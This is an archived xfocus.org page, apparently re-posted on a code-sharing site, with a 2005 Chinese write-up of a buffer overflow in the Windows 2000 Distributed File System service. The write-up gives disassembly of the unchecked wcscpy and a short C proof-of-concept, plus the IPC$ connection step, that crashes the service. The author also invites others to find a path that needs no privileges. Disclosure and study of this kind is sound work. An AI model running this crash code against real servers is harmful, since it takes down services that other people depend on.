📄 784.html

📁 里面收集的是发表在www.xfocus.org上的文章
💻 HTML
字号:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>最近发现的一个Distributed File System服务远程溢出问题 </title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="Keywords" content="安全焦点, xfocus, 陷阱网络, honeynet, honeypot, 调查取证, forensic, 入侵检测, intrusion detection, 无线安全, wireless security, 安全论坛, security forums, 安全工具, security tools, 攻击程序, exploits, 安全公告, security advisories, 安全漏洞, security vulnerabilities, 安全教程, security tutorials, 安全培训, security training, 安全帮助, security help, 安全标准, security standards, 安全代码, security code, 安全资源, security resources, 安全编程, security programming, 加密, cryptography," />
<link rel="stylesheet" href="../../css/plone.css" type="text/css">
</head>

<body bgcolor="#FFFFFF" text="#000000">
<div class="top">
  <div class="searchBox">
    <form name="searchform" action="http://www.google.com/search" method="get">
      <input type="hidden" name="domains" value="www.xfocus.net">
      <input type="hidden" name="sitesearch" value="www.xfocus.net">
      <input type="text" name="q" size="20">
      <input type="submit" name="btnG" value="Google Search">
    </form>
  </div>
  <img src="../../images/logo.gif" border="0" width="180" height="80" alt="xfocus logo">
  <img src="../../images/title.gif" border="0" width="230" height="20" alt="xfocus title">
</div>
<div class="tabs">
  <a href="../../index.html" class="plain">首页</a>
  <a href="../../releases/index.html" class="plain">焦点原创</a>
  <a href="../../articles/index.html" class="selected">安全文摘</a>
  <a href="../../tools/index.html" class="plain">安全工具</a>
  <a href="../../vuls/index.html" class="plain">安全漏洞</a>
  <a href="../../projects/index.html" class="plain">焦点项目</a>
  <a href="https://www.xfocus.net/bbs/index.php?lang=cn" class="plain">焦点论坛</a>
  <a href="../../about/index.html" class="plain">关于我们</a>
</div>
<div class="personalBar">
  <a href='https://www.xfocus.net/php/add_article.php'>添加文章</a> <a href='http://www.xfocus.org/'>English Version</a>
</div>
<table class="columns">
  <tr>
    <td class="left">
<div class="box">
  <h5>&nbsp;文章分类&nbsp;</h5>
  <div class="body">
    <div class="content odd">
       <div style="white-space: nowrap;">
	    <img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/4.html'>专题文章</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/2.html'><b>漏洞分析 <<</b></a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/3.html'>安全配置</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/1.html'>黑客教学</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/5.html'>编程技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/7.html'>工具介绍</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/6.html'>火墙技术</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/8.html'>入侵检测</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/9.html'>破解专题</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/11.html'>焦点公告</a><br><img src='../../images/folder_icon.gif' border='0'> <a href='../../articles/12.html'>焦点峰会</a><br>
       </div>
	    
    </div>
  </div>
</div>

<div class="box">
  <h5>&nbsp;文章推荐&nbsp;</h5>
  <div class="body">
    <div class="content odd">
	    <img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200408/733.html'>补丁管理最佳安全实践之资产评估</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200404/689.html'>国内网络安全风险评估市场与技术操作</a><br><img src='../../images/document_icon.gif' border='0'> <a href='../../articles/200410/743.html'>协作的信息系统风险评估</a><br>
    </div>
  </div>
</div>
	</td>
    <td class="main">
	  <h1>最近发现的一个Distributed File System服务远程溢出问题</h1><br>创建时间：2005-03-13<br>文章属性：原创<br>文章提交：<a href='https://www.xfocus.net/bbs/index.php?lang=cn&act=Profile&do=03&MID=11092'>rootshell</a> (sysadm_at_21cn.com)<br><br>最近发现的一个Distributed File System服务远程溢出问题<br />
date:03/13/2005<br />
author:fzk<br />
qq:1734398<br />
MSN:sysadm@21cn.com<br />
email:sysadm@21cn.com<br />
URL:<a href='http://www.ns-one.com' target='_blank'>http://www.ns-one.com</a><br />
<br />
<br />
1.前言:<br />
&nbsp;&nbsp;&nbsp;&nbsp;最近在windows 2000 advanced server下研究Distributed File System服务的时候,在当中一个函数发现一个<br />
溢出,经过测试,发现需要远程通过目标机的管理员组成员和Distributed File System服务建立name pipe,才能发生<br />
溢出,不知道这样的问题,属于不属于安全漏洞呢?<br />
<br />
&nbsp;&nbsp;&nbsp;&nbsp;今天决定发出来给大家共同研究一下,说不定有可能其他高手发现不需要通过目标机的管理员组成员权限来进行<br />
溢出,那这个就算真正的安全问题了,而且危害性肯定也强了,那当然也记得给我发个信通知一下如何实现.:)<br />
<br />
<br />
2.问题细节:<br />
&nbsp;&nbsp;&nbsp;&nbsp;这个溢出问题,是发生在Distributed File System服务里面的NetrDfsAddStdRootForced函数在处理第四个参数<br />
上面,这个第四个参数是会作为第五个参数传递给SetupStdDfs的,在这个函数里面调用wcscpy,问题出在这里没有进行<br />
边界检查,导致溢出的代码如下:<br />
<br />
NetrDfsAddStdRootForced函数<br />
...............<br />
&nbsp;&nbsp;.text:0100A2B5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp; edi, [ebp+arg_C]<br />
&nbsp;&nbsp;.text:0100A2B8&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; test&nbsp;&nbsp;&nbsp;&nbsp;edi, edi<br />
&nbsp;&nbsp;.text:0100A2AF&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jz&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;loc_100A373<br />
...............<br />
&nbsp;&nbsp;.text:0100A31F&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;edi<br />
&nbsp;&nbsp;.text:0100A320&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;1<br />
&nbsp;&nbsp;.text:0100A322&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;[ebp+arg_8]<br />
&nbsp;&nbsp;.text:0100A325&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; lea&nbsp;&nbsp;&nbsp;&nbsp; eax, [ebp+var_214]<br />
&nbsp;&nbsp;.text:0100A32B&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;[ebp+arg_4]<br />
&nbsp;&nbsp;.text:0100A32E&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;eax<br />
&nbsp;&nbsp;.text:0100A32F&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; call&nbsp;&nbsp;&nbsp;&nbsp;SetupStdDfs<br />
...............<br />
&nbsp;&nbsp;SetupStdDfs函数<br />
.text:01007FB4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;ebp<br />
.text:01007FB5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp; ebp, esp<br />
.text:01007FB7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sub&nbsp;&nbsp;&nbsp;&nbsp; esp, 658h<br />
.text:01007FBD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;ebx<br />
.text:01007FBE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mov&nbsp;&nbsp;&nbsp;&nbsp; ebx, ds:wcscpy<br />
.text:01007FC4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;esi<br />
.text:01007FC5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;edi<br />
.text:01007FC6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; xor&nbsp;&nbsp;&nbsp;&nbsp; esi, esi<br />
.text:01007FC8&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; xor&nbsp;&nbsp;&nbsp;&nbsp; edi, edi<br />
.text:01007FCA&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; cmp&nbsp;&nbsp;&nbsp;&nbsp; [ebp+arg_10], esi<br />
.text:01007FCD&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; jnz&nbsp;&nbsp;&nbsp;&nbsp; short loc_1007FE2<br />
...............<br />
.text:01007FE2 loc_1007FE2:<br />
.text:01007FE2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;[ebp+arg_10]<br />
.text:01007FE5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; lea&nbsp;&nbsp;&nbsp;&nbsp; eax, [ebp+var_43C]<br />
.text:01007FEB&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; push&nbsp;&nbsp;&nbsp;&nbsp;eax<br />
.text:01007FEC&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; call&nbsp;&nbsp;&nbsp;&nbsp;ebx ; wcscpy<br />
<br />
调用流程为:<br />
<br />
NetrDfsAddStdRootForced-&gt;SetupStdDfs-&gt;wcscpy<br />
<br />
<br />
3.溢出测试方法:<br />
<br />
(1).先使用目标机器的管理员组成员建立一个ipc$连接<br />
net use \\目标机器ip\ipc$ 管理员组成员密码 /user:管理员组成员账号<br />
<br />
(2).使用如下测试代码测试:<br />
#include &lt;stdio.h&gt;<br />
#include &lt;stdlib.h&gt;<br />
#include &lt;windows.h&gt;<br />
#include &lt;Lm.h&gt;<br />
#include &lt;Lmdfs.h&gt;<br />
<br />
#pragma comment(lib, &quot;Netapi32.lib&quot;)<br />
<br />
int main (void)<br />
{<br />
 wchar_t a[]=L&quot;\\\\ip\\&quot;; //把ip替换为你的目标机器ip<br />
 wchar_t b[4000];<br />
 LPWSTR ServerName=a;<br />
 LPWSTR RootShare=L&quot;fzk&quot;;<br />
 LPWSTR Comment=L&quot;fzk&quot;;<br />
 LPWSTR Store;<br />
 int i;<br />
<br />
 for (i = 0; i&lt; 2000;i++)<br />
&nbsp;&nbsp;&nbsp;&nbsp; wcscat(b, L&quot;A&quot;);<br />
<br />
 Store = b;<br />
<br />
 if( NetDfsAddStdRootForced( ServerName, RootShare, Comment, Store) == NERR_Success)<br />
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return TRUE;<br />
<br />
 else<br />
&nbsp;&nbsp;&nbsp;&nbsp; return FALSE;<br />
}<br />
<br />
把以上代码存为test.cpp,运行cl test.cpp编译,然后执行test.exe,到这里应该目标机器的<br />
Distributed File System服务已经down掉了<br />
<br />
4.附加信息:<br />
在MSDN发现NetDfsAddStdRootForced API在windows 2003已经被弃用了<br />
Distributed File System服务在windows 2000服务器下面是默认开放的<br />
如果有高手能实现不用任何权限来进行溢出,应该可以干掉很多windows 2000的服务器<br />
当然也记得通知我<br />
email:sysadm@21cn.com<br />
qq:1734398<br />
MSN:sysadm@21cn.com
	</td>
  </tr>
</table>
<div class="footer">
  Copyright &copy; 1998-2003 XFOCUS Team. All Rights Reserved
</div>
</body>
</html>
💿 文件大小 601 K
👤 上传用户 lovely19891019
📂 所属分类其他
🏷️ 相关标签

#xfocus #www #org
⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -